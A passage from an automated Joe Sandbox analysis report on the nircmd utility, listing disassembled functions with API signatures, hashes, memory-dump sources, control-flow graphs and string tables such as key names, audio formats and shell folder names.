                                                                                                                                                          • API String ID: 1639700516-0
                                                                                                                                                          • Opcode ID: 304827a3127d4a5bdf69b16fafecb2355fd447e7cb9098548c500361c931fcad
                                                                                                                                                          • Instruction ID: 637f7e620fe251cd115490af5a8a2b3b32472531be00e9bef735f51ec9f7a446
                                                                                                                                                          • Opcode Fuzzy Hash: 304827a3127d4a5bdf69b16fafecb2355fd447e7cb9098548c500361c931fcad
                                                                                                                                                          • Instruction Fuzzy Hash: 4E716FBA6087C196E721EF26E4403DFB7A5F3C8788F504105EB8947A6ADB79C569CF00
                                                                                                                                                          Function 0000000140003460 Relevance: 19.6, APIs: 13, Instructions: 88fileclipboardCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$ClipboardWrite$CloseGlobal$CreateDataHandleLockOpenPointerSizeUnlockwcslen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2754100261-0
                                                                                                                                                          • Opcode ID: fb3eb45e02e49d35a7c808b506a5959101515ac6b39324c226a5f7fb066a4e8f
                                                                                                                                                          • Instruction ID: 278a198e614677eb6afed1273267a4e9d32d1a56db9bac36d709b89ee6aafe43
                                                                                                                                                          • Opcode Fuzzy Hash: fb3eb45e02e49d35a7c808b506a5959101515ac6b39324c226a5f7fb066a4e8f
                                                                                                                                                          • Instruction Fuzzy Hash: D4311971204A4186EB26DF27B944B99B7A1F78CBD5F484225FB4A0BBB4DF3DC5498B00
                                                                                                                                                          Function 00000001400026E4 Relevance: 13.6, APIs: 9, Instructions: 55clipboardwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Clipboard$Object$BitmapCloseCreateDataDeleteEmptyOpenRelease
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3734427525-0
                                                                                                                                                          • Opcode ID: 2ee4699f7e54552f39dc1c75ba184e0a9f52eba41ec52a202aaa8e6ff451679d
                                                                                                                                                          • Instruction ID: b802e652a4c781d6b228e8acbfbfab419a3eb1019eabbd7ff838afd257ef1046
                                                                                                                                                          • Opcode Fuzzy Hash: 2ee4699f7e54552f39dc1c75ba184e0a9f52eba41ec52a202aaa8e6ff451679d
                                                                                                                                                          • Instruction Fuzzy Hash: 4D210B71208B8482EB269B22F41879AB375FB8CBD5F444025EB4E4B668DF7DC448C741
                                                                                                                                                          Function 00000001400036C0 Relevance: 12.0, APIs: 8, Instructions: 41clipboardmemorystringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3116012682-0
                                                                                                                                                          • Opcode ID: 5486ec16f31df42d0f73b6e3c540f55b943ac455c19588f72c45d8f6ec40e0f4
                                                                                                                                                          • Instruction ID: a41993afba0805fd620efad0e6c8d0e0ce27379e36244ca6a759b907d6220151
                                                                                                                                                          • Opcode Fuzzy Hash: 5486ec16f31df42d0f73b6e3c540f55b943ac455c19588f72c45d8f6ec40e0f4
                                                                                                                                                          • Instruction Fuzzy Hash: AD017C7120868087EA02AF63F848399A361FB48FC1F484024FF4E0BB69CF3DC5868700
                                                                                                                                                          Function 0000000140003B64 Relevance: 7.6, APIs: 5, Instructions: 56filestringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$Filestrlen$CloseFirstNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 661139469-0
                                                                                                                                                          • Opcode ID: caa4555100c915afd4e01d6bebafbf778538a2d92feb6952a5ab3ee5d86551d1
                                                                                                                                                          • Instruction ID: d13add1d2ff5988385b25eebd5bf377e428e0fab13b15c69c85cbfee361c10d8
                                                                                                                                                          • Opcode Fuzzy Hash: caa4555100c915afd4e01d6bebafbf778538a2d92feb6952a5ab3ee5d86551d1
                                                                                                                                                          • Instruction Fuzzy Hash: 31216A72201A4081EB12DF26E4407DC77A8F789FE8F984222FB694B7A9CF79C542C300
                                                                                                                                                          Function 0000000140002C80 Relevance: 7.5, APIs: 5, Instructions: 41filestringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File$CloseFirstNextstrcpystrrchr
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1245589722-0
                                                                                                                                                          • Opcode ID: 910786598e5d435a8a9ff82bebefb36c3e02d9f4283bf6c12d2b63e921746403
                                                                                                                                                          • Instruction ID: 015854f4e76dd3a35983573dd1b3b8a6d787d1de89efc91eed4372a910bfa56b
                                                                                                                                                          • Opcode Fuzzy Hash: 910786598e5d435a8a9ff82bebefb36c3e02d9f4283bf6c12d2b63e921746403
                                                                                                                                                          • Instruction Fuzzy Hash: 3811AD7120968081EA32DB26B4803E953A0A78C7D4F484221FBAE4B7E5DB3CC509C700
                                                                                                                                                          Function 000000014000400C Relevance: 4.6, APIs: 3, Instructions: 61comCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharCreateInstanceMultiUninitializeWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 350316761-0
                                                                                                                                                          • Opcode ID: cc3e032d867f99d1e13ae4fc5c214053d257773a60e739736fbf50c22d7bb053
                                                                                                                                                          • Instruction ID: 8753275f31e9ba9882de33253c6482eda5d8f23547b1328accfa0723b118336f
                                                                                                                                                          • Opcode Fuzzy Hash: cc3e032d867f99d1e13ae4fc5c214053d257773a60e739736fbf50c22d7bb053
                                                                                                                                                          • Instruction Fuzzy Hash: 6721EA76304B8582DB20CF6AE48878AB7A1F788FD4F448221EB5D87B64DF3AC549C700
                                                                                                                                                          Function 0000000140002BB0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Version
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                                          • Opcode ID: ada5291300686dcf0f0a66b6616c5012a212a71fd53881ca22a0db5172722a72
                                                                                                                                                          • Instruction ID: d09e19c19d1dc85cfd1a90655b4e7daef93ee698defbac0b7edc2f71c64746f5
                                                                                                                                                          • Opcode Fuzzy Hash: ada5291300686dcf0f0a66b6616c5012a212a71fd53881ca22a0db5172722a72
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD092B4A0161189EF169F02E8447C03360B39C384F800502E21C0B270D77A429AC719
                                                                                                                                                          Function 0000000140004A18 Relevance: 168.2, APIs: 1, Strings: 95, Instructions: 221COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 594 140004a18-14000503f 595 140005043-140005051 _stricmp 594->595 596 140005053-14000505f 595->596 597 140005065 595->597 596->595 598 140005061-140005063 596->598 599 140005067-14000507b 597->599 598->599
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp
                                                                                                                                                          • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$11kHz16BitMono$11kHz16BitStereo$11kHz8BitMono$11kHz8BitStereo$12kHz16BitMono$12kHz16BitStereo$12kHz8BitMono$12kHz8BitStereo$16kHz16BitMono$16kHz16BitStereo$16kHz8BitMono$16kHz8BitStereo$2$22kHz16BitMono$22kHz16BitStereo$22kHz8BitMono$22kHz8BitStereo$24kHz16BitMono$24kHz16BitStereo$24kHz8BitMono$24kHz8BitStereo$3$32kHz16BitMono$32kHz16BitStereo$32kHz8BitMono$32kHz8BitStereo$4$44kHz16BitMono$44kHz16BitStereo$44kHz8BitMono$44kHz8BitStereo$48kHz16BitMono$48kHz16BitStereo$48kHz8BitMono$48kHz8BitStereo$5$6$7$8$8kHz16BitMono$8kHz16BitStereo$8kHz8BitMono$8kHz8BitStereo$9$:$;$<$=$ADPCM_11kHzMono$ADPCM_11kHzStereo$ADPCM_22kHzMono$ADPCM_22kHzStereo$ADPCM_44kHzMono$ADPCM_44kHzStereo$ADPCM_8kHzMono$ADPCM_8kHzStereo$CCITT_ALaw_11kHzMono$CCITT_ALaw_11kHzStereo$CCITT_ALaw_22kHzMono$CCITT_ALaw_22kHzStereo$CCITT_ALaw_44kHzMono$CCITT_ALaw_44kHzStereo$CCITT_ALaw_8kHzMono$CCITT_ALaw_8kHzStereo$CCITT_uLaw_11kHzMono$CCITT_uLaw_11kHzStereo$CCITT_uLaw_22kHzMono$CCITT_uLaw_22kHzStereo$CCITT_uLaw_44kHzMono$CCITT_uLaw_44kHzStereo$CCITT_uLaw_8kHzMono$CCITT_uLaw_8kHzStereo$GSM610_11kHzMono$GSM610_22kHzMono$GSM610_44kHzMono$GSM610_8kHzMono$TrueSpeech_8kHz1BitMono
                                                                                                                                                          • API String ID: 2884411883-1037774944
                                                                                                                                                          • Opcode ID: d70550c0440889a686cea5063e2ef8aa3b50c21217f2e4e1d352cad3864b59f0
                                                                                                                                                          • Instruction ID: 3e39611247d011695e157f3766e747293e5343851f00120df62e4fdd221dc957
                                                                                                                                                          • Opcode Fuzzy Hash: d70550c0440889a686cea5063e2ef8aa3b50c21217f2e4e1d352cad3864b59f0
                                                                                                                                                          • Instruction Fuzzy Hash: CDF10F76209B84D9E762CF01E8483C977B8F34C394F810265DB9C4B764EBBAC659CB41
                                                                                                                                                          Function 0000000140008700 Relevance: 149.1, APIs: 44, Strings: 41, Instructions: 343stringCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 600 140008700-14000872c strlen 601 140008759-14000876a _stricmp 600->601 602 14000872e-140008733 600->602 605 140008775-140008786 _stricmp 601->605 606 14000876c-140008770 601->606 603 140008735-14000873a 602->603 604 14000873c-140008740 602->604 603->604 610 140008745-14000874a 603->610 607 140008c19-140008c30 604->607 608 140008791-1400087a2 _stricmp 605->608 609 140008788-14000878c 605->609 606->607 611 1400087a4-1400087a8 608->611 612 1400087ad-1400087be _stricmp 608->612 609->607 610->601 613 14000874c-140008754 610->613 611->607 614 1400087c9-1400087da _stricmp 612->614 615 1400087c0-1400087c4 612->615 613->607 616 1400087e5-1400087f6 _stricmp 614->616 617 1400087dc-1400087e0 614->617 615->607 618 140008801-140008812 _stricmp 616->618 619 1400087f8-1400087fc 616->619 617->607 620 140008814-140008818 618->620 621 14000881d-14000882e _stricmp 618->621 619->607 620->607 622 140008839-14000884a _stricmp 621->622 623 140008830-140008834 621->623 624 140008855-140008866 _stricmp 622->624 625 14000884c-140008850 622->625 623->607 626 140008871-140008882 _stricmp 624->626 627 140008868-14000886c 624->627 625->607 628 140008884-140008888 626->628 629 14000888d-14000889e _stricmp 626->629 627->607 628->607 630 1400088a9-1400088ba _stricmp 629->630 631 1400088a0-1400088a4 629->631 632 1400088c5-1400088d6 _stricmp 630->632 633 1400088bc-1400088c0 630->633 631->607 634 1400088e1-1400088f2 _stricmp 632->634 635 1400088d8-1400088dc 632->635 633->607 636 1400088f4-1400088f8 634->636 637 1400088fd-14000890e _stricmp 634->637 635->607 636->607 638 140008919-14000892a _stricmp 637->638 639 140008910-140008914 637->639 640 140008935-140008946 _stricmp 638->640 641 14000892c-140008930 638->641 639->607 642 140008951-140008962 _stricmp 640->642 643 140008948-14000894c 640->643 641->607 644 140008964-140008968 642->644 645 14000896d-14000897e _stricmp 642->645 643->607 644->607 646 140008989-14000899a _stricmp 645->646 647 140008980-140008984 645->647 648 1400089a5-1400089b6 _stricmp 646->648 649 14000899c-1400089a0 646->649 647->607 650 1400089c1-1400089d2 _stricmp 648->650 651 1400089b8-1400089bc 648->651 649->607 652 1400089d4-1400089d8 650->652 653 1400089dd-1400089ee _stricmp 650->653 651->607 652->607 654 1400089f9-140008a0a _stricmp 653->654 655 1400089f0-1400089f4 653->655 656 140008a15-140008a26 _stricmp 654->656 657 140008a0c-140008a10 654->657 655->607 658 140008a31-140008a42 _stricmp 656->658 659 140008a28-140008a2c 656->659 657->607 660 140008a44-140008a48 658->660 661 140008a4d-140008a5e _stricmp 658->661 659->607 660->607 662 140008a69-140008a7a _stricmp 661->662 663 140008a60-140008a64 661->663 664 140008a85-140008a96 _stricmp 662->664 665 140008a7c-140008a80 662->665 663->607 664->607 666 140008a9c-140008aad _stricmp 664->666 665->607 667 140008ab8-140008ac9 _stricmp 666->667 668 140008aaf-140008ab3 666->668 669 140008ad4-140008ae5 _stricmp 667->669 670 140008acb-140008acf 667->670 668->607 671 140008ae7-140008aeb 669->671 672 140008af0-140008b01 _stricmp 669->672 670->607 671->607 673 140008b03-140008b07 672->673 674 140008b0c-140008b1d _stricmp 672->674 673->607 675 140008b28-140008b39 _stricmp 674->675 676 140008b1f-140008b23 674->676 677 140008b43-140008b54 _stricmp 675->677 678 140008b3b-140008b3e 675->678 676->607 679 140008b56-140008b5a 677->679 680 140008b5f-140008b70 _stricmp 677->680 678->607 679->607 681 140008b72-140008b76 680->681 682 140008b7b-140008b8c _stricmp 680->682 681->607 683 140008b97-140008ba8 _stricmp 682->683 684 140008b8e-140008b92 682->684 685 140008baa-140008bae 683->685 686 140008bb0-140008bc1 _stricmp 683->686 684->607 685->607 687 140008bc3-140008bc7 686->687 688 140008bc9-140008bda _stricmp 686->688 687->607 689 140008be2-140008be5 688->689 690 140008bdc-140008be0 688->690 691 140008be7-140008bee 689->691 692 140008bf0-140008bf4 689->692 690->607 691->692 693 140008bfc-140008c07 call 1400031d8 691->693 694 140008bf6-140008bfa 692->694 695 140008c09-140008c16 atoi 692->695 693->607 694->693 694->695 695->607
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$strlen
                                                                                                                                                          • String ID: add$alt$apps$backspace$cancel$capslock$comma$ctrl$delete$divide$down$end$enter$esc$home$insert$left$leftctrl$leftmenu$leftshift$lwin$minus$multiply$numlock$pagedown$pageup$pause$period$plus$printscreen$right$rightctrl$rightmenu$rightshift$rwin$scroll$seperator$shift$spc$subtract$tab
                                                                                                                                                          • API String ID: 2980640259-1786004257
                                                                                                                                                          • Opcode ID: 9abfa71ef75f7d638ff01bad16b0735d36e9e6dd0787ff677aeb7262dac5c1e7
                                                                                                                                                          • Instruction ID: 586b292cae3c7236d704391288e737e9a81ef9a250587a0436488aae1d98b5ab
                                                                                                                                                          • Opcode Fuzzy Hash: 9abfa71ef75f7d638ff01bad16b0735d36e9e6dd0787ff677aeb7262dac5c1e7
                                                                                                                                                          • Instruction Fuzzy Hash: 72D1F7B420860184FA33F717A6D47F916A2B75E7C8F844022BF854F6B7EB7AC5498312
                                                                                                                                                          Function 0000000140009A40 Relevance: 84.3, APIs: 35, Strings: 13, Instructions: 282stringwindowthreadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 698 140009a40-140009ad1 memset GetWindowTextA strlen 700 140009ad7-140009af6 _stricmp 698->700 701 140009d3a-140009d59 _stricmp 698->701 704 140009af8-140009b0d _stricmp 700->704 705 140009b10-140009b21 _stricmp 700->705 702 140009d5b-140009d66 IsWindowVisible 701->702 703 140009d8d-140009d9e _stricmp 701->703 702->703 706 140009d68-140009d83 GetWindowRect 702->706 707 140009e44-140009e55 _stricmp 703->707 708 140009da4-140009daf IsWindowVisible 703->708 704->705 709 140009b23-140009b3d _strnicmp 705->709 710 140009b40-140009b51 _stricmp 705->710 706->703 711 140009d85-140009d87 706->711 713 140009e57-140009e59 707->713 714 140009e5d-140009e5f 707->714 708->707 712 140009db5-140009df3 memset GetClassNameA _stricmp 708->712 709->710 715 140009b53-140009b6a call 140002960 710->715 716 140009b6d-140009b7e _stricmp 710->716 711->703 712->707 722 140009df5-140009e08 _stricmp 712->722 713->714 718 140009e61-140009e6d 714->718 719 140009e75-140009e97 714->719 715->716 720 140009bc7 716->720 721 140009b80-140009b93 strlen 716->721 724 140009e70 call 14000902c 718->724 726 140009bcc-140009bdd _stricmp 720->726 721->720 725 140009b95-140009bc5 strlen _strnicmp 721->725 722->707 727 140009e0a-140009e1d _stricmp 722->727 724->719 725->726 728 140009c01-140009c12 _stricmp 726->728 729 140009bdf-140009bfe call 140002df4 GetWindowLongA 726->729 727->707 730 140009e1f-140009e3a GetWindowRect 727->730 732 140009c14-140009c4d memset GetClassNameA _stricmp 728->732 733 140009c50-140009c61 _stricmp 728->733 729->728 730->707 734 140009e3c-140009e3e 730->734 732->733 736 140009d35 733->736 737 140009c67-140009c72 IsWindowVisible 733->737 734->707 736->701 737->736 738 140009c78-140009c9e GetWindowThreadProcessId 737->738 739 140009cb8-140009cbf call 14001212c 738->739 740 140009ca0-140009cb6 call 140002df4 738->740 746 140009cc1-140009ce4 memset 739->746 747 140009d26-140009d30 call 140006f64 739->747 745 140009d20 740->745 745->701 750 140009d22-140009d24 745->750 749 140009ce6 call 14001223c 746->749 747->736 751 140009ceb-140009cf9 749->751 750->701 752 140009cfe-140009d00 751->752 753 140009d02-140009d04 752->753 754 140009d16-140009d1e _stricmp 752->754 755 140009d06-140009d08 753->755 756 140009d0a 753->756 754->745 755->756 757 140009d0e-140009d14 755->757 756->757 757->752
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp$Window$memset$Visiblestrlen$ClassNameProcessRect_strnicmp$CloseHandleLongOpenTextThread
                                                                                                                                                          • String ID: Failed to load the process library !$all$alltop$alltopnodesktop$button$class$etitle$ititle$process$progman$shell_traywnd$stitle$title
                                                                                                                                                          • API String ID: 4153955639-424509323
                                                                                                                                                          • Opcode ID: d9f3fe5908264a6c0b6f314ec0262b687ee55f1a90f8b8ba82be27fa541aa2f7
                                                                                                                                                          • Instruction ID: a35943e2c190f0362e0fb30fdff4f0a4967e4d889f383578cc40d30c7811ac33
                                                                                                                                                          • Opcode Fuzzy Hash: d9f3fe5908264a6c0b6f314ec0262b687ee55f1a90f8b8ba82be27fa541aa2f7
                                                                                                                                                          • Instruction Fuzzy Hash: 7CC181B131868186FB52EB27E4807D96391BB8DBC5F855021FF0A8F6A6EF79C905C700
                                                                                                                                                          Function 0000000140007A34 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 128COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 906 140007a34-140007a54 _stricmp 907 140007a56-140007a5b 906->907 908 140007a60-140007a71 _stricmp 906->908 909 140007c20-140007c2c 907->909 910 140007a73-140007a78 908->910 911 140007a7d-140007a8e _stricmp 908->911 910->909 912 140007a9a-140007aab _stricmp 911->912 913 140007a90-140007a95 911->913 914 140007ab7-140007ac8 _stricmp 912->914 915 140007aad-140007ab2 912->915 913->909 916 140007ad4-140007ae5 _stricmp 914->916 917 140007aca-140007acf 914->917 915->909 918 140007af1-140007b02 _stricmp 916->918 919 140007ae7-140007aec 916->919 917->909 920 140007b04-140007b09 918->920 921 140007b0e-140007b1f _stricmp 918->921 919->909 920->909 922 140007b21-140007b26 921->922 923 140007b2b-140007b3c _stricmp 921->923 922->909 924 140007b48-140007b59 _stricmp 923->924 925 140007b3e-140007b43 923->925 926 140007b65-140007b76 _stricmp 924->926 927 140007b5b-140007b60 924->927 925->909 928 140007b82-140007b93 _stricmp 926->928 929 140007b78-140007b7d 926->929 927->909 930 140007b95-140007b9a 928->930 931 140007b9f-140007bb0 _stricmp 928->931 929->909 930->909 932 140007bb2-140007bb7 931->932 933 140007bb9-140007bca _stricmp 931->933 932->909 934 140007bd3-140007be4 _stricmp 933->934 935 140007bcc-140007bd1 933->935 936 140007be6-140007beb 934->936 937 140007bed-140007bfe _stricmp 934->937 935->909 936->909 938 140007c07-140007c1d _stricmp 937->938 939 140007c00-140007c05 937->939 938->909 939->909
                                                                                                                                                          APIs
                                                                                                                                                          • _stricmp.MSVCRT(?,?,?,000000014000796A,?,?,?,0000000140006868), ref: 0000000140007A4D
                                                                                                                                                          • _stricmp.MSVCRT(?,?,?,000000014000796A,?,?,?,0000000140006868), ref: 0000000140007A6A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2526432556.0000000140001000.00000020.00000001.01000000.00000013.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2526400716.0000000140000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2526550604.000000014001E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_140000000_nircmd.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _stricmp
                                                                                                                                                          • String ID: appdata$common_desktop$common_favorites$common_programfiles$common_programs$common_start_menu$common_startup$cookies$desktop$favorites$localappdata$mydocuments$programfiles$programs$recent$start_menu$startup
                                                                                                                                                          • API String ID: 2884411883-967716430
                                                                                                                                                          • Opcode ID: bf5ec251c9ea9e39a30859fb856664287b19f3ed4b695ca1d824430e38975b76
                                                                                                                                                          • Instruction ID: eb0f4245ef0181a247808bc7761b251c1f7249733d235826eb4b59dba5eac938
                                                                                                                                                          • Opcode Fuzzy Hash: bf5ec251c9ea9e39a30859fb856664287b19f3ed4b695ca1d824430e38975b76
                                                                                                                                                          • Instruction Fuzzy Hash: 2C51D5F070820090FA26EB07A5C0BFC5351A74D7C8F904426FB1A4F6F6DB7DCA899212
                                                                                                                                                          Function 0000000140012EA4 Relevance: 52.6, APIs: 18, Strings: 12, Instructions: 150stringlibraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
